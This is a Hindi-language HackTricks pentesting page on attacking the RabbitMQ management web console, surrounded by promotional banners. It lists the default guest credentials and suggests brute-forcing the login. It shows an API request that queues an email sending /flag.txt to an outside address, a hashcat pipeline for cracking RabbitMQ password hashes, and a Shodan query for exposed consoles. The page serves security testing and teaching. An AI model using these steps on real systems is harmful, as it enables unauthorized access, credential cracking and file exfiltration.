7.7 KiB
15672 - पेंटेस्टिंग रैबिटएमक्यू प्रबंधन
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
- आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
- हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
- शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
- हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।
बग बाउंटी टिप: Intigriti के लिए साइन अप करें, एक प्रीमियम बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाया गया है! हमारे साथ जुड़ें https://go.intigriti.com/hacktricks आज ही, और शुरू करें बाउंटी अप टू $100,000 तक कमाना!
{% embed url="https://go.intigriti.com/hacktricks" %}
मूलभूत जानकारी
आप 5671,5672 - Pentesting AMQP में रैबिटएमक्यू के बारे में अधिक जानकारी प्राप्त कर सकते हैं।
इस पोर्ट में रैबिटएमक्यू प्रबंधन वेब कंसोल मिल सकती है अगर प्रबंधन प्लगइन सक्षम है।
मुख्य पृष्ठ इस तरह दिखना चाहिए:
गणना
डिफ़ॉल्ट क्रेडेंशियल्स हैं "guest":"guest"। यदि वे काम नहीं कर रहे हैं तो आप लॉगिन को ब्रूट-फोर्स करने का प्रयास कर सकते हैं।
इस मॉड्यूल को मैन्युअल रूप से शुरू करने के लिए आपको निम्नलिखित को निष्पादित करना होगा:
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart
जब आप सही तरीके से प्रमाणीकृत हो जाते हैं तो आप व्यवस्थापक कंसोल देखेंगे:
इसके अलावा, यदि आपके पास वैध क्रेडेंशियल्स हैं तो आपको http://localhost:15672/api/connections
की जानकारी देखने में रुचि मिल सकती है।
ध्यान दें कि इस सेवा के API का उपयोग करके एक कतार के अंदर डेटा प्रकाशित करना संभव है जैसे कि निम्नलिखित अनुरोध के साथ:
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
हैश को क्रैक करना
echo <base64 rabbit mq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt
hashcat -m 1420 --hex-salt hash.txt wordlist
शोडन
port:15672 http
बग बाउंटी टिप: Intigriti में साइन अप करें, एक प्रीमियम बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाया गया है! आज ही हमारे साथ जुड़ें https://go.intigriti.com/hacktricks और शुरू करें बाउंटी कमाना जो तकनीकी त्रुटियों तक $100,000 तक हो सकता है!
{% embed url="https://go.intigriti.com/hacktricks" %}
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
- शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
- हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।